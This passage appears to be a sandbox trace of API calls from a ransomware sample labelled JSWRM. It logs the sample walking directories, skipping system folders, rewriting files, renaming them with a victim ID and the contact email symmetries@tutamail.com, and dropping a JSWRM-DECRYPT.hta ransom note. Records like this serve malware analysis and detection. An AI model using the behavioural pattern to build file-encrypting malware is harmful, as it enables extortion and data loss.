RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0059.332] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.333] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=3643) returned 1 [0059.333] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe30) returned 0x23dc88 [0059.333] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xe30, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xe30, lpOverlapped=0x0) returned 1 [0059.334] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.334] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xe30, lpOverlapped=0x0) returned 1 [0059.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0059.334] CloseHandle (hObject=0x3d4) returned 1 [0059.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0059.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.335] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0059.335] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.335] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0059.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0059.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0059.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0059.336] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0059.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0059.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.336] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0059.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0059.336] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0059.336] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a04d001, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a04d001, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a073462, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0059.336] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0059.336] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0059.336] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0059.336] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0059.336] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0059.336] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0059.336] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0059.336] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0059.337] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0059.337] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0059.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0059.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0059.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0059.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0059.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0059.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0059.337] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.337] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0059.337] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0059.337] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0059.337] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0059.337] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0059.337] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0059.337] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0059.337] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0059.337] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0059.337] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0059.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0059.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.337] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0059.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0059.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0059.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0059.338] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.338] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=80060) returned 1 [0059.338] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x138b0) returned 0x2471a8 [0059.338] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x138b0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x138b0, lpOverlapped=0x0) returned 1 [0059.486] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.486] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x138b0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x138b0, lpOverlapped=0x0) returned 1 [0059.486] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.487] CloseHandle (hObject=0x3d4) returned 1 [0059.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0059.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0059.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0059.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0059.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0059.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0059.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0059.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0059.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.490] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0059.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0059.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0059.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0059.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0059.491] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.491] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0059.491] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0059.491] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0059.491] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0059.491] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0059.491] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0059.491] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0059.491] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0059.491] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0059.491] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0059.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0059.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x2411c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0059.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241038, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0059.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0059.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0059.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0059.491] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.491] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0059.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0059.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0059.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.492] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1041", cAlternateFileName="")) returned 1 [0059.492] lstrcmpiW (lpString1="1041", lpString2=".") returned 1 [0059.492] lstrcmpiW (lpString1="1041", lpString2="..") returned 1 [0059.492] lstrcmpiW (lpString1="1041", lpString2="...") returned 1 [0059.492] lstrcmpiW (lpString1="1041", lpString2="windows") returned -1 [0059.492] lstrcmpiW (lpString1="1041", lpString2="recovery") returned -1 [0059.492] lstrcmpiW (lpString1="1041", lpString2="perflogs") returned -1 [0059.492] lstrcmpiW (lpString1="1041", lpString2="documents and settings") returned -1 [0059.492] lstrcmpiW (lpString1="1041", lpString2="$RECYCLE.BIN") returned 1 [0059.492] lstrcmpiW (lpString1="1041", lpString2="system volume information") returned -1 [0059.492] lstrcmpiW (lpString1="1041", lpString2="msocache") returned -1 [0059.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0059.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2265b0 [0059.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0059.492] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1041\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1041\\jswrm-decrypt.hta")) returned 0xffffffff [0059.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2265b0 | out: hHeap=0x1e0000) returned 1 [0059.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.493] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0059.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0059.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0059.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0059.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0059.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0059.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225f30 [0059.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0059.493] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1041\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1041\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0059.602] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.602] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0059.603] CloseHandle (hObject=0x450) returned 1 [0059.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225f30 | out: hHeap=0x1e0000) returned 1 [0059.603] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 